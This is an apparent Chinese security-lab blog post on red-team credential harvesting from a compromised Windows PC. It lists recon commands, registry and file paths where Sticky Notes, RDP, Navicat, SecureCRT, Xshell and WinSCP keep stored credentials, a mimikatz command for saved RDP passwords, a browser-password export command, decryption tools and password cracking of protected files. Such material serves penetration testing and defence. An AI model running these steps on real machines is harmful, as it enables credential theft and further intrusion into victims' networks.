『红蓝对抗』论个人电脑的信息收集

求关注吖

日期：2022-03-10

作者：hdsec

介绍：论如何从个人机器获取有用的信息......

0x00 前言

当我们定位并控制了一台个人机后，可以分析其基本的网络信息、浏览器保存的密码以及常用的远程管理软件等，并尝试破解其保存的凭证，从而快速获取管理员拥有的各种权限，进一步控制目标网络。

0x01 基本信息搜集

1.1 查看网络信息

ipconfig /all                                   查看网络配置ipconfig /displaydns                            查看dns缓存type c:WindowsSystem32driversetchosts      查看hosts文件netstat -ano                                    查看端口信息net user                                        查看用户net use                                         网络共享

1.2 查看杀软信息

运行命令tasklist /svc可以根据进程列表快速匹配目标计算机安装的杀软应用。可以使用hacking8杀毒识别工具或者参考processes.txt^[1]获取更多的进程对应关系。

1.3 查看便签信息

有的管理员可能习惯在便签中存储账号密码等敏感信息。

win7中存储路径：C:UsersusernameAppDataRoamingMicrosoftSticky NotesStickyNotes
win10中存储路径：C:UsersusernameAppDataLocalPackagesMicrosoft.MicrosoftStickyNotes_8wekyb3d8bbweLocalStateplum.sqlite

1.4 查看代理信息

通过查询注册表查看用户配置过的代理信息。

reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings" /v ProxyServer

1.5 查看远程连接信息

1）通过查询注册表查看当前用户远程连接过的桌面。

reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s

2)运行powershell脚本查询所有用户的rdp连接信息。（需要管理员权限）

https://github.com/3gstudent/List-RDP-Connections-History/blob/master/ListAllUsers.ps1

3）利用mimikatz获取系统保存的rdp密码。（需要管理员权限）

命令：privilege::debugvault::cred /patchexit

0x02 获取浏览器保存的敏感信息

有些人为了方便登录系统，往往会在浏览器中记住密码，那么我们可以利用工具 HackBrowserData^[2] 获取浏览器中保存的敏感信息。

HackBrowserData是一款可全平台运行的浏览器数据导出解密工具。

在目标机器的dos窗口中运行命令：

hack-browser-data--windows-64bit.exe -b all -f json --dir results --cc

运行完成后会在当前路径下生成results/archive.zip，解压archive.zip会看到json格式的浏览器中保存的敏感信息。

0x03 远程连接凭据收集

3.1 Navicate

凭证保存的位置：

【 MySQL 】
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers
【 MariaDB 】 
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMARIADBServers
【 MongoDB 】
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMONGODBServers
【 Microsoft SQL 】 
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMSSQLServers
【 Oracle 】 
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatOraServers
【 PostgreSQL 】
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatPGServers
【 SQLite 】 
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatSQLiteServers

使用脚本how-does-navicat-encrypt-password^[3]可以对加密的凭证进行破解得到明文密码。

3.2 其他

在相应的位置找到凭据后，使用破解工具进行破解，从而获取我们想要的数据。类似的工具有很多，下面只列举几个比较常见的。

(1) SecureCRT

【 xp/win2003 】
C:Documents and SettingsUSERNAMEApplication DataVanDykeConfigSessions
【 win7/win2008以上 】
C:UsersUSERNAMEAppDataRoamingVanDykeConfigSessions

破解工具：how-does-SecureCRT-encrypt-password^[4]

(2) Xshell

【 Xshell 5 】
%userprofile%DocumentsNetSarangXshellSessions
【 Xshell 6】
%userprofile%DocumentsNetSarang Computer6XshellSessions

破解工具：Xdecrypt^[5]

(3) WinSCP

HKEY_USERSSIDSoftwareMartin PrikrylWinSCP 2Sessions

破解工具：winscppwd^[6]

等等.......

0x04 暴力破解有密码保护的文件

在搜集的过程中往往会遇到加密的文档、压缩包等受密码保护的文件，里面很有可能存放了敏感的信息，像是web后台登录密码、远程连接账号密码等等，那么我们就可以利用工具John the Ripper^[7]破解带有密码保护的文件。

John the Ripper是一个快速的密码破解工具，用于在已知密文的情况下尝试破解出明文，支持目前大多数的加密算法，如DES、MD4、MD5等。

如下图所示我们可以破解带有密码保护的zip文件，与此类似的我们还可以破解有密码保护的office文件、keepass数据库文件、pfx证书等。

暴力破解的关键在于破解字典的强大性，我们可以根据前期搜集到的信息构造密码本进行暴力破解。

0x05 总结

对个人机器的分析需要细致并耐心的分析，当遇到不熟悉的软件可以在本地搭建相同的环境，并制定对策。上面总结的并不全面，自己在实际应用中可以补充，就酱样啦啾咪~~~~~~

References

[1] processes.txt: https://github.com/v1ado/HIPS_LIPS/blob/master/processes.txt
[2] HackBrowserData: https://github.com/moonD4rk/HackBrowserData
[3] how-does-navicat-encrypt-password: https://github.com/HyperSine/how-does-navicat-encrypt-password
[4] how-does-SecureCRT-encrypt-password: https://github.com/HyperSine/how-does-SecureCRT-encrypt-password
[5] Xdecrypt: https://github.com/dzxs/Xdecrypt
[6] winscppwd: media/16444726285808/winscppwd.exe
[7] John the Ripper: https://www.openwall.com/john/

免责声明：本文仅供安全研究与讨论之用，严禁用于非法用途，违者后果自负。

宸极实验室隶属山东九州信泰信息科技股份有限公司，致力于网络安全对抗技术研究，是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域，善于利用黑客视角发现和解决网络安全问题。

团队自成立以来，圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动，并积极参加各类网络安全竞赛，屡获殊荣。

对信息安全感兴趣的小伙伴欢迎加入宸极实验室，关注公众号，回复『招聘』，获取联系方式。

原文始发于微信公众号（宸极实验室）：『红蓝对抗』论个人电脑的信息收集